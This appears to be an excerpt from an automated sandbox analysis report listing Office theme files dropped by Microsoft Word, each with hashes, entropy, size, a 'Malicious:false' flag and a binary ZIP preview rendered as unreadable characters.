                                    Encrypted:false
                                    SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                    MD5:35200E94CEB3BB7A8B34B4E93E039023
                                    SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                    SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                    SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                    Malicious:false
                                    Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):558035
                                    Entropy (8bit):7.696653383430889
                                    Encrypted:false
                                    SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                    MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                    SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                    SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                    SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                    Malicious:false
                                    Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):570901
                                    Entropy (8bit):7.674434888248144
                                    Encrypted:false
                                    SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                    MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                    SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                    SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                    SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                    Malicious:false
                                    Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):523048
                                    Entropy (8bit):7.715248170753013
                                    Encrypted:false
                                    SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                    MD5:C276F590BB846309A5E30ADC35C502AD
                                    SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                    SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                    SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                    Malicious:false
                                    Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):3078052
                                    Entropy (8bit):7.954129852655753
                                    Encrypted:false
                                    SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                    MD5:CDF98D6B111CF35576343B962EA5EEC6
                                    SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                    SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                    SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                    Malicious:false
                                    Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):777647
                                    Entropy (8bit):7.689662652914981
                                    Encrypted:false
                                    SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                    MD5:B30D2EF0FC261AECE90B62E9C5597379
                                    SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                    SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                    SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                    Malicious:false
                                    Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):924687
                                    Entropy (8bit):7.824849396154325
                                    Encrypted:false
                                    SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                    MD5:97EEC245165F2296139EF8D4D43BBB66
                                    SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                    SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                    SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                    Malicious:false
                                    Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):966946
                                    Entropy (8bit):7.8785200658952
                                    Encrypted:false
                                    SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                    MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                    SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                    SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                    SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                    Malicious:false
                                    Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):1204049
                                    Entropy (8bit):7.92476783994848
                                    Encrypted:false
                                    SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                    MD5:FD5BBC58056522847B3B75750603DF0C
                                    SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                    SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                    SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                    Malicious:false
                                    Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):486596
                                    Entropy (8bit):7.668294441507828
                                    Encrypted:false
                                    SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                    MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                    SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                    SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                    SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                    Malicious:false
                                    Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):976001
                                    Entropy (8bit):7.791956689344336
                                    Encrypted:false
                                    SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                    MD5:9E563D44C28B9632A7CF4BD046161994
                                    SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                    SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                    SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                    Malicious:false
                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):1463634
                                    Entropy (8bit):7.898382456989258
                                    Encrypted:false
                                    SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                    MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                    SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                    SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                    SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                    Malicious:false
                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):2218943
                                    Entropy (8bit):7.942378408801199
                                    Encrypted:false
                                    SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                    MD5:EE33FDA08FBF10EF6450B875717F8887
                                    SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                    SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                    SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                    Malicious:false
                                    Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):1750795
                                    Entropy (8bit):7.892395931401988
                                    Encrypted:false
                                    SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                    MD5:529795E0B55926752462CBF32C14E738
                                    SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                    SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                    SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                    Malicious:false
